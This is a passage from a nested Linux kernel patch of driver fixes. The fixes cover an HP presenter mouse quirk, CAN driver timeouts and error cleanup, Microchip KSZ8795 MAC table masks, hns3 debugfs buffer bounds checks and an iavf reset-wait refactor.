+-	if (unlikely(pos->first == res && pos->last == res)) {
++	if (unlikely(WARN_ON(!pos->first || !pos->last) ||
++		     (pos->first == res && pos->last == res))) {
+ 		pos->first = NULL;
+ 		pos->last = NULL;
+ 	} else if (pos->first == res) {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 653db6cdab579..9a17e5cc3539b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -614,6 +614,7 @@
+ #define USB_DEVICE_ID_UGCI_FIGHTING	0x0030
+ 
+ #define USB_VENDOR_ID_HP		0x03f0
++#define USB_PRODUCT_ID_HP_ELITE_PRESENTER_MOUSE_464A		0x464a
+ #define USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0A4A	0x0a4a
+ #define USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0B4A	0x0b4a
+ #define USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE		0x134a
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 66e64350f1386..f8f20a7c24b17 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -96,6 +96,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HOLTEK_ALT, USB_DEVICE_ID_HOLTEK_ALT_KEYBOARD_A096), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HOLTEK_ALT, USB_DEVICE_ID_HOLTEK_ALT_KEYBOARD_A293), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0A4A), HID_QUIRK_ALWAYS_POLL },
++	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_ELITE_PRESENTER_MOUSE_464A), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_LOGITECH_OEM_USB_OPTICAL_MOUSE_0B4A), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE_094A), HID_QUIRK_ALWAYS_POLL },
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index 68df6d4641b5c..eebf967f4711a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -227,6 +227,8 @@ static int
+ __mcp251xfd_chip_set_mode(const struct mcp251xfd_priv *priv,
+ 			  const u8 mode_req, bool nowait)
+ {
++	const struct can_bittiming *bt = &priv->can.bittiming;
++	unsigned long timeout_us = MCP251XFD_POLL_TIMEOUT_US;
+ 	u32 con = 0, con_reqop, osc = 0;
+ 	u8 mode;
+ 	int err;
+@@ -246,12 +248,16 @@ __mcp251xfd_chip_set_mode(const struct mcp251xfd_priv *priv,
+ 	if (mode_req == MCP251XFD_REG_CON_MODE_SLEEP || nowait)
+ 		return 0;
+ 
++	if (bt->bitrate)
++		timeout_us = max_t(unsigned long, timeout_us,
++				   MCP251XFD_FRAME_LEN_MAX_BITS * USEC_PER_SEC /
++				   bt->bitrate);
++
+ 	err = regmap_read_poll_timeout(priv->map_reg, MCP251XFD_REG_CON, con,
+ 				       !mcp251xfd_reg_invalid(con) &&
+ 				       FIELD_GET(MCP251XFD_REG_CON_OPMOD_MASK,
+ 						 con) == mode_req,
+-				       MCP251XFD_POLL_SLEEP_US,
+-				       MCP251XFD_POLL_TIMEOUT_US);
++				       MCP251XFD_POLL_SLEEP_US, timeout_us);
+ 	if (err != -ETIMEDOUT && err != -EBADMSG)
+ 		return err;
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index 2b0309fedfac5..ba0fd2b95a52a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -387,6 +387,7 @@ static_assert(MCP251XFD_TIMESTAMP_WORK_DELAY_SEC <
+ #define MCP251XFD_OSC_STAB_TIMEOUT_US (10 * MCP251XFD_OSC_STAB_SLEEP_US)
+ #define MCP251XFD_POLL_SLEEP_US (10)
+ #define MCP251XFD_POLL_TIMEOUT_US (USEC_PER_MSEC)
++#define MCP251XFD_FRAME_LEN_MAX_BITS (736)
+ 
+ /* Misc */
+ #define MCP251XFD_NAPI_WEIGHT 32
+diff --git a/drivers/net/can/usb/gs_usb.c b/drivers/net/can/usb/gs_usb.c
+index 9c2c25fde3d14..fe532d5048897 100644
+--- a/drivers/net/can/usb/gs_usb.c
++++ b/drivers/net/can/usb/gs_usb.c
+@@ -833,6 +833,7 @@ static int gs_can_open(struct net_device *netdev)
+ 		.mode = cpu_to_le32(GS_CAN_MODE_START),
+ 	};
+ 	struct gs_host_frame *hf;
++	struct urb *urb = NULL;
+ 	u32 ctrlmode;
+ 	u32 flags = 0;
+ 	int rc, i;
+@@ -858,13 +859,14 @@ static int gs_can_open(struct net_device *netdev)
+ 
+ 	if (!parent->active_channels) {
+ 		for (i = 0; i < GS_MAX_RX_URBS; i++) {
+-			struct urb *urb;
+ 			u8 *buf;
+ 
+ 			/* alloc rx urb */
+ 			urb = usb_alloc_urb(0, GFP_KERNEL);
+-			if (!urb)
+-				return -ENOMEM;
++			if (!urb) {
++				rc = -ENOMEM;
++				goto out_usb_kill_anchored_urbs;
++			}
+ 
+ 			/* alloc rx buffer */
+ 			buf = kmalloc(dev->parent->hf_size_rx,
+@@ -872,8 +874,8 @@ static int gs_can_open(struct net_device *netdev)
+ 			if (!buf) {
+ 				netdev_err(netdev,
+ 					   "No memory left for USB buffer\n");
+-				usb_free_urb(urb);
+-				return -ENOMEM;
++				rc = -ENOMEM;
++				goto out_usb_free_urb;
+ 			}
+ 
+ 			/* fill, anchor, and submit rx urb */
+@@ -896,9 +898,7 @@ static int gs_can_open(struct net_device *netdev)
+ 				netdev_err(netdev,
+ 					   "usb_submit failed (err=%d)\n", rc);
+ 
+-				usb_unanchor_urb(urb);
+-				usb_free_urb(urb);
+-				break;
++				goto out_usb_unanchor_urb;
+ 			}
+ 
+ 			/* Drop reference,
+@@ -944,7 +944,8 @@ static int gs_can_open(struct net_device *netdev)
+ 		if (dev->feature & GS_CAN_FEATURE_HW_TIMESTAMP)
+ 			gs_usb_timestamp_stop(dev);
+ 		dev->can.state = CAN_STATE_STOPPED;
+-		return rc;
++
++		goto out_usb_kill_anchored_urbs;
+ 	}
+ 
+ 	parent->active_channels++;
+@@ -952,6 +953,18 @@ static int gs_can_open(struct net_device *netdev)
+ 		netif_start_queue(netdev);
+ 
+ 	return 0;
++
++out_usb_unanchor_urb:
++	usb_unanchor_urb(urb);
++out_usb_free_urb:
++	usb_free_urb(urb);
++out_usb_kill_anchored_urbs:
++	if (!parent->active_channels)
++		usb_kill_anchored_urbs(&dev->tx_submitted);
++
++	close_candev(netdev);
++
++	return rc;
+ }
+ 
+ static int gs_can_close(struct net_device *netdev)
+diff --git a/drivers/net/dsa/microchip/ksz8.h b/drivers/net/dsa/microchip/ksz8.h
+index 8582b4b67d989..28137c4bf2928 100644
+--- a/drivers/net/dsa/microchip/ksz8.h
++++ b/drivers/net/dsa/microchip/ksz8.h
+@@ -21,8 +21,6 @@ int ksz8_r_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 *val);
+ int ksz8_w_phy(struct ksz_device *dev, u16 phy, u16 reg, u16 val);
+ int ksz8_r_dyn_mac_table(struct ksz_device *dev, u16 addr, u8 *mac_addr,
+ 			 u8 *fid, u8 *src_port, u8 *timestamp, u16 *entries);
+-int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+-			 struct alu_struct *alu);
+ void ksz8_w_sta_mac_table(struct ksz_device *dev, u16 addr,
+ 			  struct alu_struct *alu);
+ void ksz8_r_mib_cnt(struct ksz_device *dev, int port, u16 addr, u64 *cnt);
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index 22250ae222b5b..c63e082dc57dc 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -406,8 +406,8 @@ int ksz8_r_dyn_mac_table(struct ksz_device *dev, u16 addr, u8 *mac_addr,
+ 	return rc;
+ }
+ 
+-int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+-			 struct alu_struct *alu)
++static int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
++				struct alu_struct *alu, bool *valid)
+ {
+ 	u32 data_hi, data_lo;
+ 	const u8 *shifts;
+@@ -420,28 +420,38 @@ int ksz8_r_sta_mac_table(struct ksz_device *dev, u16 addr,
+ 	ksz8_r_table(dev, TABLE_STATIC_MAC, addr, &data);
+ 	data_hi = data >> 32;
+ 	data_lo = (u32)data;
+-	if (data_hi & (masks[STATIC_MAC_TABLE_VALID] |
+-			masks[STATIC_MAC_TABLE_OVERRIDE])) {
+-		alu->mac[5] = (u8)data_lo;
+-		alu->mac[4] = (u8)(data_lo >> 8);
+-		alu->mac[3] = (u8)(data_lo >> 16);
+-		alu->mac[2] = (u8)(data_lo >> 24);
+-		alu->mac[1] = (u8)data_hi;
+-		alu->mac[0] = (u8)(data_hi >> 8);
+-		alu->port_forward =
+-			(data_hi & masks[STATIC_MAC_TABLE_FWD_PORTS]) >>
+-				shifts[STATIC_MAC_FWD_PORTS];
+-		alu->is_override =
+-			(data_hi & masks[STATIC_MAC_TABLE_OVERRIDE]) ? 1 : 0;
+-		data_hi >>= 1;
+-		alu->is_static = true;
+-		alu->is_use_fid =
+-			(data_hi & masks[STATIC_MAC_TABLE_USE_FID]) ? 1 : 0;
+-		alu->fid = (data_hi & masks[STATIC_MAC_TABLE_FID]) >>
+-				shifts[STATIC_MAC_FID];
++
++	if (!(data_hi & (masks[STATIC_MAC_TABLE_VALID] |
++			 masks[STATIC_MAC_TABLE_OVERRIDE]))) {
++		*valid = false;
+ 		return 0;
+ 	}
+-	return -ENXIO;
++
++	alu->mac[5] = (u8)data_lo;
++	alu->mac[4] = (u8)(data_lo >> 8);
++	alu->mac[3] = (u8)(data_lo >> 16);
++	alu->mac[2] = (u8)(data_lo >> 24);
++	alu->mac[1] = (u8)data_hi;
++	alu->mac[0] = (u8)(data_hi >> 8);
++	alu->port_forward =
++		(data_hi & masks[STATIC_MAC_TABLE_FWD_PORTS]) >>
++			shifts[STATIC_MAC_FWD_PORTS];
++	alu->is_override = (data_hi & masks[STATIC_MAC_TABLE_OVERRIDE]) ? 1 : 0;
++
++	/* KSZ8795 family switches have STATIC_MAC_TABLE_USE_FID and
++	 * STATIC_MAC_TABLE_FID definitions off by 1 when doing read on the
++	 * static MAC table compared to doing write.
++	 */
++	if (ksz_is_ksz87xx(dev))
++		data_hi >>= 1;
++	alu->is_static = true;
++	alu->is_use_fid = (data_hi & masks[STATIC_MAC_TABLE_USE_FID]) ? 1 : 0;
++	alu->fid = (data_hi & masks[STATIC_MAC_TABLE_FID]) >>
++		shifts[STATIC_MAC_FID];
++
++	*valid = true;
++
++	return 0;
+ }
+ 
+ void ksz8_w_sta_mac_table(struct ksz_device *dev, u16 addr,
+@@ -926,24 +936,29 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	return ret;
+ }
+ 
+-int ksz8_mdb_add(struct ksz_device *dev, int port,
+-		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++static int ksz8_add_sta_mac(struct ksz_device *dev, int port,
++			    const unsigned char *addr, u16 vid)
+ {
+ 	struct alu_struct alu;
+-	int index;
++	int index, ret;
+ 	int empty = 0;
+ 
+ 	alu.port_forward = 0;
+ 	for (index = 0; index < dev->info->num_statics; index++) {
+-		if (!ksz8_r_sta_mac_table(dev, index, &alu)) {
+-			/* Found one already in static MAC table. */
+-			if (!memcmp(alu.mac, mdb->addr, ETH_ALEN) &&
+-			    alu.fid == mdb->vid)
+-				break;
+-		/* Remember the first empty entry. */
+-		} else if (!empty) {
+-			empty = index + 1;
++		bool valid;
++
++		ret = ksz8_r_sta_mac_table(dev, index, &alu, &valid);
++		if (ret)
++			return ret;
++		if (!valid) {
++			/* Remember the first empty entry. */
++			if (!empty)
++				empty = index + 1;
++			continue;
+ 		}
++
++		if (!memcmp(alu.mac, addr, ETH_ALEN) && alu.fid == vid)
++			break;
+ 	}
+ 
+ 	/* no available entry */
+@@ -954,34 +969,38 @@ int ksz8_mdb_add(struct ksz_device *dev, int port,
+ 	if (index == dev->info->num_statics) {
+ 		index = empty - 1;
+ 		memset(&alu, 0, sizeof(alu));
+-		memcpy(alu.mac, mdb->addr, ETH_ALEN);
++		memcpy(alu.mac, addr, ETH_ALEN);
+ 		alu.is_static = true;
+ 	}
+ 	alu.port_forward |= BIT(port);
+-	if (mdb->vid) {
++	if (vid) {
+ 		alu.is_use_fid = true;
+ 
+ 		/* Need a way to map VID to FID. */
+-		alu.fid = mdb->vid;
++		alu.fid = vid;
+ 	}
+ 	ksz8_w_sta_mac_table(dev, index, &alu);
+ 
+ 	return 0;
+ }
+ 
+-int ksz8_mdb_del(struct ksz_device *dev, int port,
+-		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++static int ksz8_del_sta_mac(struct ksz_device *dev, int port,
++			    const unsigned char *addr, u16 vid)
+ {
+ 	struct alu_struct alu;
+-	int index;
++	int index, ret;
+ 
+ 	for (index = 0; index < dev->info->num_statics; index++) {
+-		if (!ksz8_r_sta_mac_table(dev, index, &alu)) {
+-			/* Found one already in static MAC table. */
+-			if (!memcmp(alu.mac, mdb->addr, ETH_ALEN) &&
+-			    alu.fid == mdb->vid)
+-				break;
+-		}
++		bool valid;
++
++		ret = ksz8_r_sta_mac_table(dev, index, &alu, &valid);
++		if (ret)
++			return ret;
++		if (!valid)
++			continue;
++
++		if (!memcmp(alu.mac, addr, ETH_ALEN) && alu.fid == vid)
++			break;
+ 	}
+ 
+ 	/* no available entry */
+@@ -998,6 +1017,18 @@ exit:
+ 	return 0;
+ }
+ 
++int ksz8_mdb_add(struct ksz_device *dev, int port,
++		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++{
++	return ksz8_add_sta_mac(dev, port, mdb->addr, mdb->vid);
++}
++
++int ksz8_mdb_del(struct ksz_device *dev, int port,
++		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++{
++	return ksz8_del_sta_mac(dev, port, mdb->addr, mdb->vid);
++}
++
+ int ksz8_port_vlan_filtering(struct ksz_device *dev, int port, bool flag,
+ 			     struct netlink_ext_ack *extack)
+ {
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 3d59298eaa5cf..8c492d56d2c36 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -286,13 +286,13 @@ static const u32 ksz8795_masks[] = {
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(21),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(23),
+ 	[STATIC_MAC_TABLE_FID]		= GENMASK(30, 24),
+-	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(26),
+-	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(24, 20),
++	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(22),
++	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(20, 16),
+ 	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(6, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(8),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+ 	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 29),
+-	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(26, 20),
++	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(22, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(26, 24),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(28, 27),
+ 	[P_MII_TX_FLOW_CTRL]		= BIT(5),
+diff --git a/drivers/net/dsa/microchip/ksz_common.h b/drivers/net/dsa/microchip/ksz_common.h
+index 9cfa179575ce8..d1b2db8e65331 100644
+--- a/drivers/net/dsa/microchip/ksz_common.h
++++ b/drivers/net/dsa/microchip/ksz_common.h
+@@ -512,6 +512,13 @@ static inline void ksz_regmap_unlock(void *__mtx)
+ 	mutex_unlock(mtx);
+ }
+ 
++static inline bool ksz_is_ksz87xx(struct ksz_device *dev)
++{
++	return dev->chip_id == KSZ8795_CHIP_ID ||
++	       dev->chip_id == KSZ8794_CHIP_ID ||
++	       dev->chip_id == KSZ8765_CHIP_ID;
++}
++
+ static inline bool ksz_is_ksz88x3(struct ksz_device *dev)
+ {
+ 	return dev->chip_id == KSZ8830_CHIP_ID;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 4db1652015d1d..b69bd44ada1f2 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -109,6 +109,13 @@ int mv88e6xxx_wait_mask(struct mv88e6xxx_chip *chip, int addr, int reg,
+ 			usleep_range(1000, 2000);
+ 	}
+ 
++	err = mv88e6xxx_read(chip, addr, reg, &data);
++	if (err)
++		return err;
++
++	if ((data & mask) == val)
++		return 0;
++
+ 	dev_err(chip->dev, "Timeout while waiting for switch\n");
+ 	return -ETIMEDOUT;
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index bcccd82a2620f..f6ededec5a4fa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -435,19 +435,36 @@ static void hns3_dbg_fill_content(char *content, u16 len,
+ 				  const struct hns3_dbg_item *items,
+ 				  const char **result, u16 size)
+ {
++#define HNS3_DBG_LINE_END_LEN	2
+ 	char *pos = content;
++	u16 item_len;
+ 	u16 i;
+ 
++	if (!len) {
++		return;
++	} else if (len <= HNS3_DBG_LINE_END_LEN) {
++		*pos++ = '\0';
++		return;
++	}
++
+ 	memset(content, ' ', len);
+-	for (i = 0; i < size; i++) {
+-		if (result)
+-			strncpy(pos, result[i], strlen(result[i]));
+-		else
+-			strncpy(pos, items[i].name, strlen(items[i].name));
++	len -= HNS3_DBG_LINE_END_LEN;
+ 
+-		pos += strlen(items[i].name) + items[i].interval;
++	for (i = 0; i < size; i++) {
++		item_len = strlen(items[i].name) + items[i].interval;
++		if (len < item_len)
++			break;
++
++		if (result) {
++			if (item_len < strlen(result[i]))
++				break;
++			strscpy(pos, result[i], strlen(result[i]));
++		} else {
++			strscpy(pos, items[i].name, strlen(items[i].name));
++		}
++		pos += item_len;
++		len -= item_len;
+ 	}
+-
+ 	*pos++ = '\n';
+ 	*pos++ = '\0';
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 142415c84c6b2..0ebc21401b7c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -87,16 +87,35 @@ static void hclge_dbg_fill_content(char *content, u16 len,
+ 				   const struct hclge_dbg_item *items,
+ 				   const char **result, u16 size)
+ {
++#define HCLGE_DBG_LINE_END_LEN	2
+ 	char *pos = content;
++	u16 item_len;
+ 	u16 i;
+ 
++	if (!len) {
++		return;
++	} else if (len <= HCLGE_DBG_LINE_END_LEN) {
++		*pos++ = '\0';
++		return;
++	}
++
+ 	memset(content, ' ', len);
++	len -= HCLGE_DBG_LINE_END_LEN;
++
+ 	for (i = 0; i < size; i++) {
+-		if (result)
+-			strncpy(pos, result[i], strlen(result[i]));
+-		else
+-			strncpy(pos, items[i].name, strlen(items[i].name));
+-		pos += strlen(items[i].name) + items[i].interval;
++		item_len = strlen(items[i].name) + items[i].interval;
++		if (len < item_len)
++			break;
++
++		if (result) {
++			if (item_len < strlen(result[i]))
++				break;
++			strscpy(pos, result[i], strlen(result[i]));
++		} else {
++			strscpy(pos, items[i].name, strlen(items[i].name));
++		}
++		pos += item_len;
++		len -= item_len;
+ 	}
+ 	*pos++ = '\n';
+ 	*pos++ = '\0';
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 6625625f91e47..543931c06bb17 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -255,8 +255,10 @@ struct iavf_adapter {
+ 	struct workqueue_struct *wq;
+ 	struct work_struct reset_task;
+ 	struct work_struct adminq_task;
++	struct work_struct finish_config;
+ 	struct delayed_work client_task;
+ 	wait_queue_head_t down_waitqueue;
++	wait_queue_head_t reset_waitqueue;
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
+@@ -518,14 +520,12 @@ int iavf_up(struct iavf_adapter *adapter);
+ void iavf_down(struct iavf_adapter *adapter);
+ int iavf_process_config(struct iavf_adapter *adapter);
+ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter);
+-void iavf_schedule_reset(struct iavf_adapter *adapter);
++void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags);
+ void iavf_schedule_request_stats(struct iavf_adapter *adapter);
++void iavf_schedule_finish_config(struct iavf_adapter *adapter);
+ void iavf_reset(struct iavf_adapter *adapter);
+ void iavf_set_ethtool_ops(struct net_device *netdev);
+ void iavf_update_stats(struct iavf_adapter *adapter);
+-void iavf_reset_interrupt_capability(struct iavf_adapter *adapter);
+-int iavf_init_interrupt_scheme(struct iavf_adapter *adapter);
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter);
+ void iavf_free_all_tx_resources(struct iavf_adapter *adapter);
+ void iavf_free_all_rx_resources(struct iavf_adapter *adapter);
+ 
+@@ -579,17 +579,11 @@ void iavf_enable_vlan_stripping_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_disable_vlan_stripping_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_enable_vlan_insertion_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_disable_vlan_insertion_v2(struct iavf_adapter *adapter, u16 tpid);
+-int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+-			     const u8 *new_mac);
+-void
+-iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+-			       netdev_features_t prev_features,
+-			       netdev_features_t features);
+ void iavf_add_fdir_filter(struct iavf_adapter *adapter);
+ void iavf_del_fdir_filter(struct iavf_adapter *adapter);
+ void iavf_add_adv_rss_cfg(struct iavf_adapter *adapter);
+ void iavf_del_adv_rss_cfg(struct iavf_adapter *adapter);
+ struct iavf_mac_filter *iavf_add_filter(struct iavf_adapter *adapter,
+ 					const u8 *macaddr);
+-int iavf_lock_timeout(struct mutex *lock, unsigned int msecs);
++int iavf_wait_for_reset(struct iavf_adapter *adapter);
+ #endif /* _IAVF_H_ */
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index 83cfc54a47062..fd6d6f6263f66 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -484,6 +484,7 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 orig_flags, new_flags, changed_flags;
++	int ret = 0;
+ 	u32 i;
+ 
+ 	orig_flags = READ_ONCE(adapter->flags);
+@@ -531,12 +532,14 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ 	/* issue a reset to force legacy-rx change to take effect */
+ 	if (changed_flags & IAVF_FLAG_LEGACY_RX) {
+ 		if (netif_running(netdev)) {
+-			adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-			queue_work(adapter->wq, &adapter->reset_task);
++			iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++			ret = iavf_wait_for_reset(adapter);
++			if (ret)
++				netdev_warn(netdev, "Changing private flags timeout or interrupted waiting for reset");
+ 		}
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+@@ -627,6 +630,7 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 new_rx_count, new_tx_count;
++	int ret = 0;
+ 
+ 	if ((ring->rx_mini_pending) || (ring->rx_jumbo_pending))
+ 		return -EINVAL;
+@@ -671,11 +675,13 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ 	}
+ 
+ 	if (netif_running(netdev)) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++		ret = iavf_wait_for_reset(adapter);
++		if (ret)
++			netdev_warn(netdev, "Changing ring parameters timeout or interrupted waiting for reset");
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+@@ -1830,7 +1836,7 @@ static int iavf_set_channels(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 num_req = ch->combined_count;
+-	int i;
++	int ret = 0;
+ 
+ 	if ((adapter->vf_res->vf_cap_flags & VIRTCHNL_VF_OFFLOAD_ADQ) &&
+ 	    adapter->num_tc) {
+@@ -1852,22 +1858,13 @@ static int iavf_set_channels(struct net_device *netdev,
+ 
+ 	adapter->num_req_queues = num_req;
+ 	adapter->flags |= IAVF_FLAG_REINIT_ITR_NEEDED;
+-	iavf_schedule_reset(adapter);
++	iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ 
+-	/* wait for the reset is done */
+-	for (i = 0; i < IAVF_RESET_WAIT_COMPLETE_COUNT; i++) {
+-		msleep(IAVF_RESET_WAIT_MS);
+-		if (adapter->flags & IAVF_FLAG_RESET_PENDING)
+-			continue;
+-		break;
+-	}
+-	if (i == IAVF_RESET_WAIT_COMPLETE_COUNT) {
+-		adapter->flags &= ~IAVF_FLAG_REINIT_ITR_NEEDED;
+-		adapter->num_active_queues = num_req;
+-		return -EOPNOTSUPP;
+-	}
++	ret = iavf_wait_for_reset(adapter);
++	if (ret)
++		netdev_warn(netdev, "Changing channel count timeout or interrupted waiting for reset");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 965d02d7ff80f..c1f91c55e1ca7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -166,6 +166,45 @@ static struct iavf_adapter *iavf_pdev_to_adapter(struct pci_dev *pdev)
+ 	return netdev_priv(pci_get_drvdata(pdev));
+ }
+ 
++/**
++ * iavf_is_reset_in_progress - Check if a reset is in progress
++ * @adapter: board private structure
++ */
++static bool iavf_is_reset_in_progress(struct iavf_adapter *adapter)
++{
++	if (adapter->state == __IAVF_RESETTING ||
++	    adapter->flags & (IAVF_FLAG_RESET_PENDING |
++			      IAVF_FLAG_RESET_NEEDED))
++		return true;
++
++	return false;
++}
++
++/**
++ * iavf_wait_for_reset - Wait for reset to finish.
++ * @adapter: board private structure
++ *
++ * Returns 0 if reset finished successfully, negative on timeout or interrupt.
++ */
++int iavf_wait_for_reset(struct iavf_adapter *adapter)
++{
++	int ret = wait_event_interruptible_timeout(adapter->reset_waitqueue,
++					!iavf_is_reset_in_progress(adapter),
++					msecs_to_jiffies(5000));
++
++	/* If ret < 0 then it means wait was interrupted.
++	 * If ret == 0 then it means we got a timeout while waiting
++	 * for reset to finish.
++	 * If ret > 0 it means reset has finished.
++	 */
++	if (ret > 0)
++		return 0;
++	else if (ret < 0)
++		return -EINTR;
++	else
++		return -EBUSY;
++}
++
+ /**
+  * iavf_allocate_dma_mem_d - OS specific memory alloc for shared code
+  * @hw:   pointer to the HW structure
+@@ -253,7 +292,7 @@ enum iavf_status iavf_free_virt_mem_d(struct iavf_hw *hw,
+  *
+  * Returns 0 on success, negative on failure
+  **/
+-int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
++static int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
+ {
+ 	unsigned int wait, delay = 10;
+ 
+@@ -270,12 +309,14 @@ int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
+ /**
+  * iavf_schedule_reset - Set the flags and schedule a reset event
